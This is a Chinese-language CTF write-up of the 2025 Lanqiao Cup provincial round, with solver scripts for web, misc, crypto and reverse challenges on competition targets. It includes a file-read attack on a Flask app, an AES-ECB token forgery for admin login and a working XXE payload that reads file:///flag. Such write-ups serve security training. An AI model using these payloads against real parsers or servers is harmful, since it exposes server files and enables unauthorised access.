2025年第十六届蓝桥杯网络安全CTF省赛(初赛)真题详解Writeup(Web、Misc、Crypto、Reverse、Pwn)

简介: 本文是2025年第十六届蓝桥杯网络安全赛道省赛CTF真题赛题详解


今年是第三届蓝桥杯网络安全CTF竞赛,相比于前两届,今年没有了理论题。这三年题目难度呈逐年上升趋势,以后大概率会越来越难。

第一题:情报收集:黑客密室逃脱(Web类题目50分)

1.1 题目描述:

image.gif 编辑

靶机题目:黑客密室逃脱

题目内容:欢迎闯入黑客密室,你被困在了顶级黑客精心设计的数字牢笼中,每一道关卡都暗藏致命陷阱!唯一的逃脱之路,是破解散落在服务器各处的加密线索,找到最终的“数字钥匙”。

访问靶机后如下图所示:

image.gif 编辑

点击【立即查看日志】:

image.gif 编辑

给出一串加密字符串,这就是密文,解密之后就是flag,点击【前往秘密区域】:

image.gif 编辑

提示我们去访问/file?name=xxx,让我们猜测文件名。我们通过课程教授的方法获取到文件名是app.py,然后通过文件包含获取源代码:

image.gif 编辑

import os
from flask import Flask, request, render_template
from config import *
# author: gamelab
app = Flask(__name__)
# 模拟敏感信息
sensitive_info = SENSITIVE_INFO
# 加密密钥
encryption_key = ENCRYPTION_KEY
def simple_encrypt(text, key):
    encrypted = bytearray()
    for i in range(len(text)):
        char = text[i]
        key_char = key[i % len(key)]
        encrypted.append(ord(char) + ord(key_char))
    return encrypted.hex()
encrypted_sensitive_info = simple_encrypt(sensitive_info, encryption_key)
# 模拟日志文件内容
log_content = f"用户访问了 /secret 页面,可能试图获取 {encrypted_sensitive_info}"
# 模拟隐藏文件内容
hidden_file_content = f"解密密钥: {encryption_key}"
# 指定安全的文件根目录
SAFE_ROOT_DIR = os.path.abspath('/app')
with open(os.path.join(SAFE_ROOT_DIR, 'hidden.txt'), 'w') as f:
    f.write(hidden_file_content)
@app.route('/')
def index():
    return render_template('index.html')
@app.route('/logs')
def logs():
    return render_template('logs.html', log_content=log_content)
@app.route('/secret')
def secret():
    return render_template('secret.html')
@app.route('/file')
def file():
    file_name = request.args.get('name')
    if not file_name:
        return render_template('no_file_name.html')
    full_path = os.path.abspath(os.path.join(SAFE_ROOT_DIR, file_name))
    if not full_path.startswith(SAFE_ROOT_DIR) or 'config' in full_path:
        return render_template('no_premission.html')
    try:
        with open(full_path, 'r', encoding='utf-8') as f:
            content = f.read()
        return render_template('file_content.html', content=content)
    except FileNotFoundError:
        return render_template('file_not_found.html')
if __name__ == '__main__':
    app.run(debug=True, host='0.0.0.0')

image.gif

程序使用simple_encrypt()函数对敏感信息进行加密,当用户访问/logs页面时返回加密后的敏感信息。

1.2 解题步骤:

当用户访问/hidden.txt页面时返回密钥key,我们手动访问一下获得秘钥:

image.gif 编辑

我们有了加密算法、密钥和密文,可以编写解密函数获取明文:

1.3 exp代码:

def simple_decrypt(encrypted_hex, key):
    encrypted_bytes = bytearray.fromhex(encrypted_hex)
    decrypted = bytearray()
    for i in range(len(encrypted_bytes)):
        encrypted_char = encrypted_bytes[i]
        key_char = key[i % len(key)]
        decrypted.append(encrypted_char - ord(key_char))
    return decrypted.decode('utf-8')
print(simple_decrypt("d9d1c4d9e0abc2a497df9a9a6c5fa4c9c9a592a8c39ccba6709b6b98a0c7c6d89cd994a39aae6f6f68af", "secret_key8672"))
# flag{7c92fbd5-1df3-4d1f-8e4f-bcf7e5855791}

image.gif

image.gif 编辑

第二题:数据分析:ezEvtx(Misc杂项类题目50分)

2.1 题目描述:

image.gif 编辑

题目内容:

EVTX文件是Windows操作系统生成的事件日志文件,用于记录系统、应用程序和安全事件。(本题需要选手找出攻击者访问成功的一个敏感文件,提交格式为flag{文件名},其中文件名不包含文件路径,且包含文件后缀)

2.2 解题步骤:

第一步,用上课教的软件elex.exe打开题目附件。

image.gif 编辑

第二步,分析题目,题目说攻击者访问成功的一个敏感文件,我们需要找到这个文件名。课堂上我们讲过,事件ID4663:文件系统操作(详细文件访问),事件ID4656:请求访问对象(通常是文件),那么我们先根据4663进行筛选。

image.gif 编辑

image.gif 编辑

找到了文件名,答案就是flag{confidential.docx}

image.gif 编辑

第三题:数据分析:flowzip(Misc杂项类题目50分)

3.1 题目描述:

image.gif 编辑

题目内容:

There are many zip files.赛题原题及工具资料下载地址:www.whsjyc.cn

3.2 解题步骤:

直接一步解,查找flag。

image.gif 编辑

第四题:密码破解:Enigma(Crypto密码学类题目50分)

4.1 题目描述:

image.gif 编辑

题目内容:

Enigma是20世纪早期由德国工程师Arthur Scherbius设计的一款便携式机械加密设备,旨在为需要高安全性通信的场景提供加密保护。其核心原理基于可旋转的机械转子、反射器和接线板的组合,通过复杂的电路转换实现对明文的加密与解密。(本题需要选手还原成原文字母,提交格式为flag{原文字母},其中原文字母为全英文大写,且去掉空格。)

image.gif 编辑

4.2 解题步骤:

这道题目比我上课时候讲的恩尼格码加密简单多了,我上课的题目要编程写脚本,这道题目直接用赛博厨师直接一步解,就可以拿到flag。打开Cyberchef,选择Enigma加密算法。放入密文,发现直接出现了明文,怀疑可能是对称加密。flag{HELLOCTFERTHISISAMESSAGEFORYOU}

image.gif 编辑

第五题:密码破解:ECBTrain(Crypto密码学类题目278分)

5.1 题目描述:

image.gif 编辑

题目内容:

AES的ECB模式存在很明显的缺陷。你能否尝试以admin身份完成本题挑战?

5.2 解题步骤:

靶机题目,加密算法为AES的ECB模式。利用了 AES-ECB 加密模式的分块独立加密特性。ECB 模式下,相同的明文块始终加密为相同的密文块,且各块加密互不影响。

靶场题目的意思是:netcat连接后,先注册,发现注册后返回auth(base64编码),再登陆的时候需要输入auth。

解题思路:第一步,第一次注册аааааааааааааааааdmin,这个账号由16个字符a和5个字符admin组成,所以加密是16个字符a为第一个独立块,admin为第二个独立块。第二步,第一次注册返回的是AES加密后的base64编码,我们获取AES密文的最后16字节就是admin加密后的密文auth。第三步,最后用这个密文的base64编码输入2登录即可获得flag。

image.gif 编辑

5.3 exp代码:

import base64
def process_base64_string(encoded_string: str) -> str:
    """提取Base64解码数据的最后16字节并重新编码为Base64字符串"""
    return base64.b64encode(base64.b64decode(encoded_string)[-16:]).decode()
if __name__ == "__main__":
    input_string = "5P11TbEOqmL1oO50uA3RAuYDAShfRHesjVDxvulTEAk="
    print("处理后的Base64字符串:", process_base64_string(input_string))

image.gif

flag值:

flag{69916f0f-eb6d-436e-ad27-0eb62dcbe740}

第六题:密码破解:easy_AES(Crypto密码学类题目286分)

6.1 题目描述:

image.gif 编辑

题目内容:

题目采用的是传统的AES加密,但是其中的key似乎可以通过爆破得到,你能找到其中的问题,解密出敏感数据吗?

题目代码如下:

from Crypto.Cipher import AES  # 导入AES加密模块
from secret import flag       # 从secret模块导入flag(假设为明文)
import random, os             # 导入random和os模块用于随机数生成
# 为消息填充字节,使其长度为16的倍数
def pad(msg):
    return msg + bytes([16 - len(msg) % 16 for _ in range(16 - len(msg) % 16)])
# 对密钥进行随机置换,生成新密钥
def permutation(key):
    tables = [hex(_)[2:] for _ in range(16)]  # 生成0-15的十六进制表(去掉"0x"前缀)
    random.shuffle(tables)                    # 随机打乱表
    newkey = "".join(tables[int(key[_], 16)] for _ in range(len(key)))  # 根据原密钥生成新密钥
    return newkey
# 生成初始密钥key0及其置换密钥key1
def gen():
    key0 = os.urandom(16).hex()  # 随机生成16字节密钥并转为十六进制字符串
    key1 = permutation(key0)     # 对key0进行置换生成key1
    return key0, key1
# 使用key0和key1进行双重AES加密
def encrypt(key0, key1, msg):
    aes0 = AES.new(key0, AES.MODE_CBC, key1)  # 用key0加密,key1作为CBC模式的IV
    aes1 = AES.new(key1, AES.MODE_CBC, key0)  # 用key1解密,key0作为CBC模式的IV
    return aes1.decrypt(aes0.encrypt(msg))    # 先加密后解密生成密文
# 生成密钥对
key0, key1 = gen()
a0, a1 = int(key0, 16), int(key1, 16)  # 将密钥转为整数
gift = a0 & a1  # 计算key0和key1的按位与,作为泄露信息
cipher = encrypt(bytes.fromhex(key0), bytes.fromhex(key1), pad(flag))  # 加密填充后的flag
print(f"gift = {gift}")
print(f"key1 = {key1}")
print(f"cipher = {cipher}")
'''
gift = 64698960125130294692475067384121553664
key1 = 74aeb356c6eb74f364cd316497c0f714
cipher = b'6\xbf\x9b\xb1\x93\x14\x82\x9a\xa4\xc2\xaf\xd0L\xad\xbb5\x0e|>\x8c|\xf0^dl~X\xc7R\xcaZ\xab\x16\xbe r\xf6Pl\xe0\x93\xfc)\x0e\x93\x8e\xd3\xd6'
'''

image.gif

6.2 exp代码:

关键点在于key1是由key0进行置换后得到的,尝试编写脚本爆破置换表后进行解密。

from Crypto.Cipher import AES  # 导入AES加密模块
# from secret import flag       # 从secret模块导入flag(假设为明文)
import random, os  # 导入random和os模块用于随机数生成
# 为消息填充字节,使其长度为16的倍数
def pad(msg):
    return msg + bytes([16 - len(msg) % 16 for _ in range(16 - len(msg) % 16)])
# 对密钥进行随机置换,生成新密钥
def permutation(key):
    tables = [hex(_)[2:] for _ in range(16)]  # 生成0-15的十六进制表(去掉"0x"前缀)
    random.shuffle(tables)  # 随机打乱表
    newkey = "".join(tables[int(key[_], 16)] for _ in range(len(key)))  # 根据原密钥生成新密钥
    return newkey
# 生成初始密钥key0及其置换密钥key1
def gen():
    key0 = os.urandom(16).hex()  # 随机生成16字节密钥并转为十六进制字符串
    key1 = permutation(key0)  # 对key0进行置换生成key1
    return key0, key1
# 使用key0和key1进行双重AES加密
def encrypt(key0, key1, msg):
    aes0 = AES.new(key0, AES.MODE_CBC, key1)  # 用key0加密,key1作为CBC模式的IV
    aes1 = AES.new(key1, AES.MODE_CBC, key0)  # 用key1解密,key0作为CBC模式的IV
    return aes1.decrypt(aes0.encrypt(msg))  # 先加密后解密生成密文
def decrypt(key0, key1, msg):
    aes0 = AES.new(key0, AES.MODE_CBC, key1)  # 用key0加密,key1作为CBC模式的IV
    aes1 = AES.new(key1, AES.MODE_CBC, key0)  # 用key1解密,key0作为CBC模式的IV
    return aes0.decrypt(aes1.encrypt(msg))  # 先加密后解密生成密文
'''
# 生成密钥对
key0, key1 = gen()
a0, a1 = int(key0, 16), int(key1, 16)  # 将密钥转为整数
gift = a0 & a1  # 计算key0和key1的按位与,作为泄露信息
cipher = encrypt(bytes.fromhex(key0), bytes.fromhex(key1), pad(flag))  # 加密填充后的flag
print(f"gift = {gift}")
print(f"key1 = {key1}")
print(f"cipher = {cipher}")
'''
gift = 64698960125130294692475067384121553664
# key1 = b''.fromhex('74aeb356c6eb74f364cd316497c0f714')
key1 = int('74aeb356c6eb74f364cd316497c0f714', 16)
cipher = b'6\xbf\x9b\xb1\x93\x14\x82\x9a\xa4\xc2\xaf\xd0L\xad\xbb5\x0e|>\x8c|\xf0^dl~X\xc7R\xcaZ\xab\x16\xbe r\xf6Pl\xe0\x93\xfc)\x0e\x93\x8e\xd3\xd6'
# gift = bytes.fromhex(hex(gift)[2:])
# key1 = bytes.fromhex(hex(key1)[2:])
gift = hex(gift)[2:]
key1 = hex(key1)[2:]
key0 = [[-1]] * 16
print(gift)
print(key1)
print(key0)
for i in range(32):
    key_new = []
    for j in range(16):
        if int(key1[i], 16) & j == int(gift[i], 16):
            # print(j)
            key_new.append(hex(j)[2:])
    # print(int(key1[i],16))
    key0[int(key1[i], 16)] = key_new
for i in range(len(key0)):
    if key0[i][0] == -1:
        key0[i] = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f']
print(key0)
key0a = []
def gogogo(used, i):
    global key0, key0a
    for j in key0[i]:
        if j not in used:
            if i != 15:
                used2 = used + [j]
                # print(used2)
                gogogo(used2, i + 1)
            else:
                key0a.append(used + [j])
gogogo([], 0)
# print(key0a)
# for i in key0a:
#     if not i is list:
#         continue
#     # for j in range(len(key1)):
#     #     try:
#     #         newkey = "".join(i[int(key1[j], 16)])
#     #     except:
#     #         print(i)
#     #         print(int(key1[j], 16))
#     #         print(i[int(key1[j], 16)])
#     #         exit(0)
#     newkey = "".join(i[int(key1[_], 16)] for _ in range(len(key1)))
#     try:
#         ret = decrypt(newkey, key1, cipher)
#         if b'flag' in ret:
#             print(ret)
#             break
#     except:
#         print(newkey)
ret_all = b''
for i in key0a:
    newkey = "".join(i[int(key1[_], 16)] for _ in range(len(key1)))
    # print(newkey)
    a0, a1 = int(newkey, 16), int(key1, 16)
    if a0 & a1 == 64698960125130294692475067384121553664:
        # print(newkey)
        ret = decrypt(bytes.fromhex(newkey), bytes.fromhex(key1), cipher)
        # print(ret)
        ret_all += ret
with open('result.txt', 'wb') as f:
    f.write(ret_all)

image.gif

生成result.txt,用winhex打开查找flag,flag{886769b5-2301-4c37-bb73-4480b4eab682}

image.gif 编辑

第七题:逆向分析:ShadowPhases(Reverse逆向类题目50分)

7.1 题目描述:

image.gif 编辑

题目内容:

在调查一起跨国数据泄露事件时,你的团队在暗网论坛发现一组被称作'三影密匣'的加密缓存文件。据匿名线报,这些文件采用上世纪某情报机构开发的“三重影位算法”,关键数据被分割为三个相位,每个相位使用不同的影位密钥混淆。威胁分析显示,若不能在48小时内还原原始信息,某关键基础设施的访问密钥将被永久销毁。逆向工程师的日志残页显示:'相位间存在密钥共鸣,但需警惕内存中的镜像陷阱..

7.2 解题步骤:

第一步,查壳,无壳64位

image.gif 编辑

第二步,IDA64位打开,拖入IDA分析,发现会将我们的input与enc进行比较。这类题目课堂上讲过多种解法,最快的就是动调。

image.gif 编辑

动调至断点处,获得flag,flag{0fa830e7-b699-4513-8e01-51f35b0f3293}

image.gif 编辑

第八题:逆向分析:BashBreaker(Reverse逆向类题目120分)

8.1 题目描述:

image.gif 编辑

题目内容:

赛博考古学界流传着一个传说——人工智能先驱艾琳·巴什博士在自杀前,将毕生研究的核心算法封存在了他的量子实验室中。这个实验室遵循古老的巴什博弈协议,唯有通过15枚光子硬币的智慧试炼,才能唤醒沉睡的实验室AI。

8.2 解题步骤:

第一步,查壳,无壳64位

image.gif 编辑

第二步,IDA64位打开,拖入IDA分析,找到main函数后发现有一个key解密函数:

image.gif 编辑

第三步,nop掉if语句,直接运行full_decrypt()函数获得key:

image.gif 编辑

第四步,找到变异的rc4函数(rc4_init和rc4_next函数多一个异或0x37,),以及密文:

image.gif 编辑

image.gif 编辑

image.gif 编辑

8.3 exp代码:

from Crypto.Cipher import ARC4
import binascii
def rc4(key: bytes, data: bytes) -> bytes:
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + (key[i % len(key)] ^ 0x37)) % 256
        S[i], S[j] = S[j], S[i]
    i = j = 0
    result = []
    for byte in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        k = S[(S[i] + S[j]) % 256]
        k = ((16 * k) | (k >> 4)) & 0xff
        result.append((byte ^ k)&0xff)
    return bytes(result)
if __name__ == "__main__":
    key = b"EC3700DFCD4F364EC54B19C5E7E26DEF6A25087C4FCDF4F8507A40A9019E3B48BD70129D0141A5B8F089F280F4BE6CCD"
    enc = [0xBB, 0xCA, 0x12, 0x14, 0xD0, 0xF1, 0x99, 0xA7, 0x91, 0x48,
  0xC3, 0x28, 0x73, 0xAD, 0xB7, 0x75, 0x8C, 0x89, 0xCD, 0xDD,
  0x2D, 0x50, 0x5D, 0x7F, 0x95, 0xB1, 0xA4, 0x9D, 0x09, 0x43,
  0xE1, 0xD2, 0xE9, 0x66, 0xEA, 0x18, 0x98, 0xC6, 0xCC, 0x02,
  0x39, 0x18]
    plaintext = bytes(enc)
    ciphertext = rc4(key, plaintext)
    print("加密结果(Hex):", bytes(ciphertext))

image.gif

image.gif 编辑

第九题:漏洞挖掘分析:星际XML解析器(web类题目)

9.1 题目描述:

你已进入星际数据的世界,输入XML数据,启动解析程序,探索未知的数据奥秘!

image.gif

9.2 解题步骤:

老师培训班讲过的原题XML攻击,直接拿老师上课的payload即可。

9.3 exp代码:

当服务器解析这段XML时:

遇到&xxe;引用时,尝试加载定义的外部实体

通过file://协议,解析器会读取服务器上的/flag文件

flag文件内容会被包含在XML响应中返回

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///flag" >]>
<creds>
    <user>&xxe;</user>
</creds>

image.gif

image.gif


相关文章
|
8月前
|
安全 网络协议 网络安全
2025年第十六届蓝桥杯网络安全CTF国赛总决赛真题详解Writeup(Web漏洞挖掘、Crypto密码学、Misc杂项、Reverse逆向、Pwn二进制漏洞)
2025年第十六届蓝桥杯网络安全CTF国赛总决赛真题详解Writeup(Web漏洞挖掘、Crypto密码学、Misc杂项、Reverse逆向、Pwn二进制漏洞)
2025年第十六届蓝桥杯网络安全CTF国赛总决赛真题详解Writeup(Web漏洞挖掘、Crypto密码学、Misc杂项、Reverse逆向、Pwn二进制漏洞)
BUUCTF FLAG 1
BUUCTF FLAG 1
1510 0
|
安全 开发工具 git
CTF工具隐写分离神器Binwalk安装和详细使用方法
CTF工具隐写分离神器Binwalk安装和详细使用方法
6520 0
|
8月前
|
数据采集 安全 算法
2024第十五届蓝桥杯网络安全赛道省赛题目writeup(包含理论题、web、crypto、misc、reverse、pwn)
本文是2024年第十五届蓝桥杯网络安全赛道CTF真题赛题详解。主要内容包括PHP运算符、代码审计、爬虫协议、流量分析、AES/RSA加密、DWT盲水印、逆向工程、栈溢出和堆漏洞利用等技术点。其中,爬虫协议题目通过访问robots.txt获取flag;流量分析题目使用Wireshark导出HTTP对象并解密base64数据;逆向工程题目分析RC4和XXTEA算法;Pwn题目利用栈溢出和UAF漏洞实现攻击。文章详细记录了每道题的解题思路和具体步骤。
2024第十五届蓝桥杯网络安全赛道省赛题目writeup(包含理论题、web、crypto、misc、reverse、pwn)
|
存储 Linux Android开发
Volatility3内存取证工具安装及入门在Linux下的安装教程
Volatility 是一个完全开源的工具,用于从内存 (RAM) 样本中提取数字工件。支持Windows,Linux,MaC,Android等多类型操作系统系统的内存取证。针对竞赛这块(CTF、技能大赛等)基本上都是用在Misc方向的取证题上面,很多没有听说过或者不会用这款工具的同学在打比赛的时候就很难受。以前很多赛项都是使用vol2.6都可以完成,但是由于操作系统更新,部分系统2.6已经不支持了,如:Win10 等镜像,而Volatility3是支持这些新版本操作系统的。
3945 0
|
算法 安全 数据安全/隐私保护
BUUCTF-[2019红帽杯]easyRE(Reverse逆向)
本文详细介绍了对一个无壳的64位ELF文件进行逆向分析的过程。首先通过IDA查找关键字符串定位主函数,然后逐步分析函数逻辑,包括读取输入、异或操作等。接着通过多次Base64解码和异或操作,最终得到了关键的flag。整个过程涉及数组寻址、条件判断和函数调用等技术细节,展示了CTF竞赛中常见的逆向工程技巧。最后附上了完整的Python代码实现,帮助读者理解和复现。
1584 1
BUUCTF-[2019红帽杯]easyRE(Reverse逆向)
|
JSON 开发框架 网络安全
[网络安全] Dirsearch 工具的安装、使用详细教程
[网络安全] Dirsearch 工具的安装、使用详细教程
11672 3
|
Java Linux 数据安全/隐私保护
CTF — 图像隐写三板斧
CTF — 图像隐写三板斧
3966 1
|
安全 Shell Linux
Webshell管理工具:AntSword(中国蚁剑)
中国蚁剑的下载、安装、详细使用步骤
13688 1

热门文章

最新文章